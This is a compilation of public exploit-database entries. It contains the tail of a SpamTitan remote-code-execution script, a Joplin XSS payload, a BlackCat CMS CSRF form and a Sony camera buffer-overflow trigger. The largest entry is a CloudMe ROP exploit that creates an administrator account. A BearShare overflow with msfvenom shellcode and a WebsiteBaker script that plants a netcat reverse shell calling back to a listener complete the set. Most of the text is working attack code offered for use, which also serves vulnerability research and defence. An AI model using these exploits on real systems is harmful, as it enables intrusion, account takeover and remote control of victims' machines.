threading.Thread(target=CVE_2020_11804, args=(cookies,target,shellurl)) rev_thread.start() # Open the reverse shell listener in this main thread info("Spawning a reverse shell listener. Wait for it...") shellServer(options.ip,int(options.port),options.quiet) elif (method == 4): info("Reading file '%s' by abusing CVE-2020-11700." % rfile, quiet) CVE_2020_11700(cookies,target,rfile) else: fail("Error authenticating. Are you providing valid credentials?") exit(2) exit(0) main() --------------------------------------------- III. Impact ~~~~~~~~~~~ Loss of confidentiality, integrity and availability of several files in the target server, as well as loss of availability of several services running in the SpamTitan. Confidentiality of critical system files, such as /etc/passwd or /etc/pwd.db would be highly impacted. IV. Disclosure ~~~~~~~~~~~~~~ Reported By: Felipe Molina de la Torre Vendor Informed: 2020-04-17 Patch Release Date: 2019-05-26 Advisory Release Date: 2019-09-18 V. References ~~~~~~~~~~~~~ * https://sensepost.com/blog/2020/clash-of-the-spamtitan/ * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11699 * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11700 * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11803 * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11804 ---------------------------------[SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution]---

# Exploit Title: Joplin 1.0.245 - Arbitrary Code Execution (PoC) # Date: 2020-09-21 # Exploit Author: Ademar Nowasky Junior (@nowaskyjr) # Vendor Homepage: https://joplinapp.org/ # Software Link: https://github.com/laurent22/joplin/releases/download/v1.0.245/Joplin-Setup-1.0.245.exe # Version: 1.0.190 to 1.0.245 # Tested on: Windows / Linux # CVE : CVE-2020-15930 # References: # https://github.com/laurent22/joplin/commit/57d750bc9aeb0f98d53ed4b924458b54984c15ff # 1. Technical Details # An XSS issue in Joplin for desktop v1.0.190 to v1.0.245 allows arbitrary code execution via a malicious HTML embed tag. # HTML embed tags are not blacklisted in Joplin's renderer. This can be chained with a bug where child windows opened through window.open() have node integration enabled to achieve ACE. # If Joplin API is enabled, Remote Code Execution with user interaction is possible by abusing the lack of required authentication in Joplin 'POST /notes' api endpoint to remotely deploy the payload into the victim application. # 2. PoC # Paste the following payload into a note: <embed src="data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)</script>"> # 2.1 RCE with user interaction # Enable Joplin API, visit exploit.html and open the created note in Joplin to execute the exploit. # By default, notes are stored in the last notebook created. <!-- exploit.html --> <script> x = new XMLHttpRequest; j = { title: "CVE-2020-15930", body: "<embed src='data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)<\/script>'>" }; x.open("POST", "http://127.0.0.1:41184/notes"); x.send(JSON.stringify(j)); </script> # To create a note in other notebooks you need the notebook ID. It's possible to get the victim's notebooks IDs due to a relaxed CORS policy in 'GET /folders' endpoint. <!-- notebooks.html --> <script> x = new XMLHttpRequest(); x.onreadystatechange = function() { if (x.readyState == XMLHttpRequest.DONE) { alert(x.responseText); } } x.open('GET', 'http://127.0.0.1:41184/folders'); x.send(); </script>

# Exploit Title: BlackCat CMS 1.3.6 - Cross-Site Request Forgery # Date: 2020-06-01 # Exploit Author: Noth # Vendor Homepage: https://github.com/BlackCatDevelopment/BlackCatCMS # Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS # Version: v1.3.6 # CVE : CVE-2020-25453 BlackCat CMS v1.3.6 has a CSRF vulnerability (bypass csrf_token) that allows remote arbitrary code execution . PoC (Remove the csrf_token value) : <input type=“hidden” name=“&#95;&#95;csrf&#95;magic” value=“”/> ------------------------------------------------------------------------------------------------------------------------------------------------- <html> <body> <script>history.pushState(",",'/')</script> <form action=“ http://127.0.0.1/blackcatcms-release-1.3/backend/login/ajax_index.php ”method=“POST”> <input type=“hidden” name=“&#95;&#95;csrf&#95;magic” value=“”/> <input type=“hidden” name=“username&#95;fieldname” value=“username&#95;274807982ed4”/> <input type=“hidden” name=“password&#95;fieldname” value=“password&#95;75868428f837”/> <input type=“hidden” name=“&#95;cat&#95;ajax” value=“1”/> <input type=“hidden” name=“username&#95;274807982ed4” value=“accountname”/> <input type=“hidden” name=“password&#95;75868428f837” value=“yourpassword”/> <input type=“submit” value=“Submit request”/> </form> </body> </html>

# Exploit Title: Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow # Google Dork: Server: Mida eFramework # Date: 2020-09-30 # Exploit Author: LiquidWorm # Vendor Homepage: https://pro.sony # Version: <= 1.82.01 #!/usr/bin/env python # # # Sony IPELA Network Camera (ftpclient.cgi) Remote Stack Buffer Overflow # # # Vendor: Sony Electronics Inc. # Product web page: https://pro.sony # Affected version: SNC-DH120T v1.82.01 # # # Summary: IPELA is Sony's vision of the ultimate workplace, designed to revolutionize # the way business communicates over global IP networks. IPELA products can improve the # efficiency of your organization by connecting people and places with high-quality audio # and video. The SNC-DH120T is an indoor tamper proof, high definition (720p) minidome # network security camera with Electronic Day/Night settings, DEPA analysis and is ONVIF # compliant. It supports dual streaming of H.264, MPEG-4 and JPEG at full frame-rate. # # Desc: The vulnerability is caused due to a boundary error in the processing of received # FTP traffic through the FTP client functionality (ftpclient.cgi), which can be exploited # to cause a stack-based buffer overflow when a user issues a POST request to connect to a # malicious FTP server. Successful exploitation could allow execution of arbitrary code on # the affected device or cause denial of service scenario. # # Tested on: gen5th/1.x # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5596 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5596.php # Fixed in 1.88.0.0: https://pro.sony/en_NL/support-resources/snc-dh120/software/mpengb00000928 # # # 28.10.2019 # # PoC: # Trigger: # curl 'http://10.0.0.3:5080/command/ftpclient.cgi' \ # -H 'Connection: keep-alive' \ # -H 'Cache-Control: max-age=0' \ # -H 'Authorization: Basic YWRtaW46YWRtaW4=' \ # -H 'Upgrade-Insecure-Requests: 1' \ # -H 'Origin: http://10.0.0.3:5080' \ # -H 'Content-Type: application/x-www-form-urlencoded' \ # -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36' \ # -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \ # -H 'Referer: http://81.83.17.200:5080/en/l4/ftp/common.html' \ # -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \ # --data 'FtpClientFunc=on&FcServerName=10.0.0.5&FcUserName=EVIL&FcPassword=NONESO&FcPassive=off&reload=referer' \ # --compressed \ # --insecure # # # Observed fixed version log: # 2020-07-27 17:48:03 FTP client Unexpected error occurred during FTP client operation. # import socket HOST = '127.0.0.1' # 10.0.0.5 PORT = 21 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((HOST, PORT)) s.listen(1) conn, addr = s.accept() print 'Connection from', addr while True: data = conn.recv(1024) if not data: break evil = "A" * 100000 evil += "B" * 10000 evil += "C" * 1000 conn.sendall(evil+'\n') s.close()

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR) # Exploit Author: Bobby Cooke (boku) # CVE: CVE-2018-6892 # Date: 2020-09-29 # Vendor Homepage: https://www.cloudme.com/ # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe # Version: 1.11.2 # Tested On: Windows 10 (x64) - 10.0.19041 Build 19041 # Script: Python 2.7 # Notes: # This exploit uses MSVCRT.System to create a new user (boku:0v3R9000!) and add the new user to the # Administrators group. A requirement of successful exploitation is the CloudMe.exe process must be # running as adminstrator, such as when ran with 'Run as Administrator'; as this permission is required # to create new users on the system. This exploit has been tested against multiple Windows 10 systems # including x86, x64, Pro, Education, Home; although there is no guarantee it will work in your CTF. # CloudMe 1.11.2 - Turing Complete Add-Admin ROP (DEP,ASLR) import os,sys,socket,struct from colorama import Fore, Back, Style F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE] B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE] S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT] ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0] err = S[3]+F[2]+'<========'+F[2]+'['+F[5]+'+++'+F[2]+'( '+F[0]+S[0] def formatMsg(STRING): return ok+S[3]+F[5]+STRING+S[0] def formatErr(STRING): return err+S[3]+F[2]+STRING+S[0] # Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename # ------------------------------------------------------------------------------------------------------- # 0x69900000 | 0x69ac1000 | False | False | False | False | False | [Qt5Network.dll] # 0x6eb40000 | 0x6eb64000 | False | False | False | False | False | [libgcc_s_dw2-1.dll] # 0x68a80000 | 0x69055000 | False | False | False | False | False | [Qt5Core.dll] # 0x00400000 | 0x00831000 | False | False | False | False | False | [CloudMe.exe] # 0x6d9c0000 | 0x6da0c000 | False | False | False | False | False | [Qt5Sql.dll] # 0x64b40000 | 0x64b5b000 | False | False | False | False | False | [libwinpthread-1.dll] # 0x66e00000 | 0x66e3d000 | False | False | False | False | False | [Qt5Xml.dll] def getESP_RC(): GaDG3Tz = [ # ESP -> EDI # Clobbers: BL # [EBX+5E5B10C4] must be writable # Requires ROPNOP # Address=68F79000 Size=0007A000 (499712.) Owner=Qt5Core 68A80000 Section=.eh_fram Type=Imag 01001002 Access=RWE CopyOnWr 0x68bb4678, # POP EBX # RETN [Qt5Core.dll] 0x0A9C8F3C, # EBX + 0x5E5B10C4 = 0x68F7A000 = Writeable Memory 0x68d5e818, # PUSH ESP # OR BL,DL # INC DWORD PTR DS:[EBX+5E5B10C4] # POP EDI # RETN 0x04 [Qt5Core.dll] 0x68D50537, # RETN - ROPNOP 0x68D50537 # RETN - ROPNOP ] print(formatMsg("Get ESP ROP Chain built!")) return ''.join(struct.pack('<I', _) for _ in GaDG3Tz) def msvcrt_rop_chain(): GaDG3Tz = [ # HMODULE LoadLibraryA( LPCSTR lpLibFileName); # $ ==> > CALL to LoadLibraryA # $+4 > FileName = "msvcrt.dll" # EAX = 0x512 = 1298 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFAEE, # NEG FFFFFAEE = 0x512 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EDI + EAX = End of string "msvcrt.dll" 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] # EAX = 0x01 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EAX = 0x0 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] # ECX = 0x0 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # Terminate String "msvcrt.dll" 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] # EAX = -0xA = 0xFFFFFFF6 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFF6, # -0xA # ESI = Start of string "msvcrt.dll\x00" 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] # EAX = PTR LoadLibraryA (from CloudMe Import Table) # CloudMe Address=0081A168 Section=.idata Type=Import (Known) Name=KERNEL32.LoadLibraryA 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFF7E5E98, # NEG FF7E5E98 = 0081A168 = PTR Kernel32.LoadLibraryA 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EAX = kernel32.LoadLibraryA 0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll] # ESI = kernel32.LoadLibraryA # EAX = Addr string "msvcrt.dll\x00" 0x68d50536, # XCHG EAX,ESI # RETN [Qt5Core.dll] # For PUSHAD we need: EDI=FarRETN # ESI=&LoadLibraryA # EAX=["msvcrt.dll"] # ECX=ROPNOP 0x68d32800, # POP ECX # RETN [Qt5Core.dll] 0x68D50537, # RETN - ROPNOP 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] 0x6990F972, # RETN 10 [Qt5Network.dll] 0x68f7bc5e, # pushad # ret # [Qt5Core.dll] # EAX -> EBP = msvcrt.dll 0x68cc462c # XCHG EAX,EBP # RETN [Qt5Core.dll] # EBP = msvcrt.dll ] print(formatMsg("LoadLibraryA(LPSTR \"msvcrt.dll\") ROP Chain built!")) return ''.join(struct.pack('<I', _) for _ in GaDG3Tz) def GetProc_system_rop_chain(): GaDG3Tz = [ # FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName); # $ ==> > CALL to GetProcAddress # EDX (ROPNOP) # $+4 > hModule = [msvcrt] # ECX # $+8 > ProcNameOrOrdinal (system) # EAX # EAX = 0x4a2 = 1186 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFB5E, # NEG FFFFFB5E = 0x4A2 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EDI + EAX = End of string "system" 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] # EAX = 0x01 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EAX = 0x0 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] # ECX = 0x0 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # Terminate String "system" 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] # EAX = -0x6 = 0xFFFFFFFA 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFFA, # -0x6 # ESI = Start of string "system\x00" 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] 0x68fcf58d, # DEC EBP # RETN [Qt5Core.dll](fix EBP for prev gadgets) # EAX = PTR GetProcAddr (from CloudMe Import Table) # CloudMe Address=0081A148 # Section=.idata # Type=Import # Name=KERNEL32.GetProcAddress 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFF7E5EB8, # NEG FF7E5EB8 = 0081A148 = PTR Kernel32.GetProcAddr 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] 0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll] 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # ESI = &kernel32.GetProcAddr # ECX=["system\x00"]# EBP=msvcrt.dll # For PUSHAD we need: EDI=FarRETN # ESI=&GetProcAddress # ECX=msvcrt.dll # EAX=["system"]# EDX=ROPNOP # EBP -> EAX = msvcrt.dll 0x68cc462c, # XCHG EAX,EBP # RETN [Qt5Core.dll] # ECX=&msvcrt.dll # EAX=["system\x00"] 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # EDX=ROPNOP 0x68f94685, # POP EDX # RETN [Qt5Core.dll] 0x68D50537, # RETN - ROPNOP # EDI=FarRETN 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] 0x699010B4, # ret 0C [Qt5Network.dll] # KERNEL32.GetProcAddress [ESI pushed to stack] # [EBP pushed to stack] # [ESP pushed to stack] # [EBX pushed to stack] # land after ret 0xC -> Qt5Core.68D50537 (ROPNOP) [EDX pushed to stack] # MSVCRT.75F60000 [ECX pushed to stack] # ASCII "system" [EAX pushed to stack] 0X68f7bc5e, # pushad # ret # [Qt5Core.dll] 0x68b1df17 # XCHG EAX,EDX # RETN # [Qt5Core.dll] # EDX = msvcrt.system ] print(formatMsg("GetProcAddress(HMODULE msvcrt, LPCSTR system) ROP Chain built!")) return ''.join(struct.pack('<I', _) for _ in GaDG3Tz) def addUsr_rop_chain(): GaDG3Tz = [ # int system( const char *command); # $ ==> > CALL to system # $+4 > command = "net user boku 0v3R9000! /add" # EAX = 0x438 = 1080 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFBC8, # NEG 0xFFFFFBC8 = 0x438 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EDI + EAX = End of string "net user..." 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] # EAX = 0x01 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EAX = 0x0 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] # ECX = 0x0 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # Terminate String "net user..." 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] # EAX = -28 = -0x1C = 0xFFFFFFE4 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFE4, # -28 = -0x1C # ESI = Start of string "net user...\x00" 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] # EDX = MSVCRT.system # ECX=0x0 # For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net user.."] # ECX=POP+RET 0x68d32800, # POP ECX # RETN [Qt5Core.dll] 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] # ESI = MSVCRT.system # EAX = ["net user.."] 0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll] 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] # EDI=FarRETN 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] 0x6990F972, # RETN 10 [Qt5Network.dll] # PUSHAD - Setup Call to MSVCRT.system on stack 0X68f7bc5e # pushad # ret # [Qt5Core.dll] ] print(formatMsg("system(const char* \"net user boku 0v3R9000! /add\") ROP Chain built!")) return ''.join(struct.pack('<I', _) for _ in GaDG3Tz) def addAdm_rop_chain(): GaDG3Tz = [ # ESI = msvcrt.system # ESI -> EDX 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] 0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll] # EAX = 0x3F7 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFC09, # NEG 0xFFFFFC09 = 0x3F7 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EDI + EAX = End of string "net local..." 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] # EAX = 0x01 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] # EAX = 0x0 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] # ECX = 0x0 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] # Terminate String "net local..." 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] # EAX = -39 = -0x27 = 0xFFFFFFE4 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] 0xFFFFFFD9, # -39 = -0x27 # ESI = Start of string "net local...\x00" 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] # EDX = MSVCRT.system # ECX=0x0 # For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net local.."] # ECX=ROPNOP 0x68d32800, # POP ECX # RETN [Qt5Core.dll] 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] # ESI = MSVCRT.system # EAX = ["net local.."] 0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll] 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] # EDI=FarRETN 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] 0x6990F972, # RETN 10 [Qt5Network.dll] # PUSHAD - Setup Call to MSVCRT.system on stack 0X68f7bc5e # pushad # ret # [Qt5Core.dll] ] print(formatMsg("system(const char* \"net localgroup Administrators boku /add\") ROP Chain built!")) return ''.join(struct.pack('<I', _) for _ in GaDG3Tz) def sendRecv(s,p): print(formatMsg("Sending payload: ")) print(S[3]+F[7]+payload+S[0]) s.send(p) data = s.recv(1024) return data def header(): head = S[3]+F[2]+' --- Cloudme v1.12 | Add Admin (boku:0v3R9000!) ---\n'+S[0] return head def sig(): SIG = S[3]+F[4]+" .-----.._ ,--.\n" SIG += F[4]+" | .. > ___ | | .--.\n" SIG += F[4]+" | |.' ,'-'"+F[2]+"* *"+F[4]+"'-. |/ /__ __\n" SIG += F[4]+" | </ "+F[2]+"* * *"+F[4]+" \ / \\/ \\\n" SIG += F[4]+" | |> ) "+F[2]+" * *"+F[4]+" / \\ \\\n" SIG += F[4]+" |____..- '-.._..-'_|\\___|._..\\___\\\n" SIG += F[4]+" _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0] return SIG def footer(): foot = formatMsg('Requires that the Cloudme program is ran using \'Run As Administrator\'\n') return foot if __name__ == "__main__": print(header()) print(sig()) print(footer()) if len(sys.argv) != 3: print(formatErr("Usage: python %s <IP> <PORT>" % sys.argv[0])) print(formaterr("Example: python %s '127.0.0.1' 8888" % sys.argv[0])) sys.exit(-1) host = sys.argv[1] port = int(sys.argv[2]) rop_chain = getESP_RC() + msvcrt_rop_chain() + getESP_RC() + GetProc_system_rop_chain() + getESP_RC() + addUsr_rop_chain() + getESP_RC() + addAdm_rop_chain() os_EIP = '\41'*1052 os_nSEH = '\x41'*(2344-len(os_EIP + rop_chain)) nSEH = '\x42'*4 SEH = '\x43'*4 buff = os_EIP + rop_chain + os_nSEH + nSEH + SEH term = '\r\n' kern32 = 'msvcrt.dll'+'AAAAAA' winExe = 'system'+'BBBBBB' addUsr = 'net user boku 0v3R9000! /add'+'CCCC' addAdm = 'net localgroup Administrators boku /add'+'DDDD' rmdr = '\x44'*(3854-len(buff)-len(kern32)-len(winExe)-len(addAdm)) payload = buff + kern32 + winExe + addUsr + addAdm + rmdr + term try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host,port)) print(formatMsg( "Successfully connected to "+host+" on port "+str(port))) resp = sendRecv(sock,payload) print(formatMsg("Closing Socket")) sock.close() print(formatErr("Exiting python script.")) except: print(formatErr("Failed to connect and send payload."))

# Title: BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC) # Date: 2020-09-29 # Author: Christian Vierschilling # Vendor Homepage: http://www.bearshareofficial.com/ # Software Link: http://www.oldversion.com.de/windows/bearshare-lite-5-2-5 # Versions: 5.1.0 - 5.2.5 # Tested on: Windows 10 x64 EN/DE # CVE: NA # --- EXPLOTATION INSTRUCTIONS --- # # 1. Adjust the values for "jmp_esp" and "shellcode" if needed # 2. Run the script to generate a file pwn.txt, containing your payload # 3. Open pwn.txt on your target (!!) (e.g. in the browser or locally) and copy the contents into the clipboard # 4. Start BearShare, click on "Advanced..." and a new window will pop up. Put the payload from pwn.txt into the field "Keywords:" within the new window. Click on "Search" in this window and your payload will be executed. # --- PAYLOAD CONSTRUCTION --- # #!/usr/bin/python import binascii # Detected the offset for overwriting the EIP register using pattern_create and pattern_offset: [*] Exact match at offset 524 junk1 = 524*"A" # Address for a JMP ESP instruction found in MSVBVM60.DLL using mona.py (You will probably need to adjust this if using another OS, language etc.) # \x66\x06\x05\x35 jmp_esp = binascii.unhexlify('35050666') # Using another 4 bytes to align the stack for clean shellcode execution junk2 = 4*"B" # As we are limited to only being able to insert alphanumeric characters, we'll create an appropriate shellcode using msfvenom. Copy the output off the following command into the variable "shellcode" below: # msfvenom -p windows/exec cmd=calc.exe BufferRegister=esp -e x86/alpha_mixed shellcode = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8k2s0C0ePsPmYKUFQKpu4nk2ptpLKf26lLK3bTTNk1bexVoH7aZWVuaiollUl3QSLtBTlepyQZofmWqZgIrjRqBrwlKRrvpLK3zgLnkbl4Qt8hc3xc1HQv1lK2ya05QkcLK3ytXzCtzg9LKednkvaN6UaioNLzaZotM7qzgvXkPQeJVEScMIhWKQmq4T5xdChnkcha47qYCPfnkFlpKlKaHeLgqjsnk6dLKc1HPlI0Da4FDqKSkE1V9CjcaYoypcoaO0ZlKTRZKnm3msZ7qnmMUX230s05Pbpe8dqNkPoMWkO9EMkHpmenBcfU8MvnuMmMMKO9EelTFQlEZK0Ikm0puWumk1WuCD2PosZ7p1CyoxU3Se1bLbCDn55qhCUuPAA" # assemble payload payload = junk1 + jmp_esp + junk2 + shellcode # write payload into pwn.txt f = open("pwn.txt", 'w') f.write(payload) f.close()

# Exploit Title: WebsiteBaker 2.12.2 - Remote Code Execution # Date: 2020-07-04 # Exploit Author: Selim Enes 'Enesdex' Karaduman # Vendor Homepage: https://websitebaker.org/pages/en/home.php # Software Link: https://wiki.websitebaker.org/doku.php/downloads # Version: 2.12.2 # Tested on: Windows 10 and Ubuntu 18.04 # Note : You start listener before execute (e.g netcat) then procide listener ip and port import requests import re from bs4 import BeautifulSoup import sys import getopt options, remainder = getopt.gnu_getopt(sys.argv[1:], 'ht:u:p:i:l:',['lhost=','lport=']) for opt, arg in options: if opt in ('-h'): print('Usage: python exploit.py -t TARGET_URL -u USERNAME -p PASSWORD --lhost LISTENER_IP --lport LISTENER_PORT') exit() elif opt in ('-t'): main_url = arg elif opt in ('-u'): usr = arg elif opt in ('-p'): passwd = arg elif opt in ('-i', '--lhost'): lhost = arg elif opt in ('-l' , '--lport'): lport = arg reverse_shell_code = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc"+" "+lhost+" "+lport +" "+">/tmp/f" shell_code_eval = "echo system('"+ reverse_shell_code + "');" print("Exploit Author: Selim Enes 'Enesdex' Karaduman" + " " + "@enesdex" + "\n") ##LOGIN PAGE HTML PARSE FOR LOGIN PARAMS url = main_url+"/admin/login/index.php" req = requests.get(url) login_page = req.text soup = BeautifulSoup(login_page, 'html.parser') username_par = soup.find_all(attrs={"type" : "hidden"})[1]['value'] password_par = soup.find_all(attrs={"type" : "hidden"})[2]['value'] weird_par = soup.find_all(attrs={"type" : "hidden"})[3]['name'] weird_val = soup.find_all(attrs={"type" : "hidden"})[3]['value'] #LOGIN TO GET SESSIoN_COOKIE login_page = requests.Session() burp0_url = main_url+"/admin/login/index.php" burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"} burp0_data = {"url": '', "username_fieldname": username_par, "password_fieldname": password_par, weird_par : weird_val, username_par : usr, password_par : passwd, "submit": ''} r = login_page.post(burp0_url, headers=burp0_headers, data=burp0_data,allow_redirects = False) cok = r.headers['Set-Cookie'] cok = cok.split(' ')[0] cookie_par = cok.split('=')[0] cookie_val = cok.split('=')[1].replace(';','') session_cookie = cookie_par + "=" + cookie_val ##ADD PAGE HTML PARSE FOR CREATE PAGE PARAMS url = main_url+"/admin/pages/index.php" cookies = {cookie_par : cookie_val} req = requests.get(url, cookies=cookies) create_page = req.text soup = BeautifulSoup(create_page, 'html.parser') weird_par1 = soup.find_all(attrs={"type" : "hidden"})[0]['name'] weird_val1 = soup.find_all(attrs={"type" : "hidden"})[0]['value'] ##Create Code Page to Put Shell Code create_page = requests.session() burp0_url = main_url+"/admin/pages/add.php" burp0_cookies = {cookie_par : cookie_val} burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"} burp0_data = {weird_par1: weird_val1, "title": "exploit-shell", "type": "code", "parent": "0", "visibility": "public", "submit": "Add"} c = create_page.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) ##FIND THE PAGE ID url = main_url+"/admin/pages/index.php" cookies = {cookie_par : cookie_val} req = requests.get(url, cookies=cookies) find_id = req.text soup = BeautifulSoup(find_id, 'html.parser') pageid = soup.find_all('option',string='exploit-shell')[0]['value'] ##HTML PARSE TO PUT SHELL CODE url = main_url+'/admin/pages/modify.php?page_id='+pageid cookies = {cookie_par : cookie_val} req = requests.get(url, cookies=cookies) add_shellcode = req.text soup = BeautifulSoup(add_shellcode, 'html.parser') weird_par2 = soup.find_all(attrs={"type" : "hidden"})[3]['name'] weird_val2 = soup.find_all(attrs={"type" : "hidden"})[3]['value'] ##ADD SHELL CODE session = requests.session() burp0_url = main_url+"/modules/code/save.php" burp0_cookies = {cookie_par : cookie_val} burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"} burp0_data = {"page_id": pageid, "section_id": pageid, weird_par2: weird_val2, "content": shell_code_eval} a = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) last_req = requests.get(main_url+"/pages/exploit-shell.php", cookies=cookies)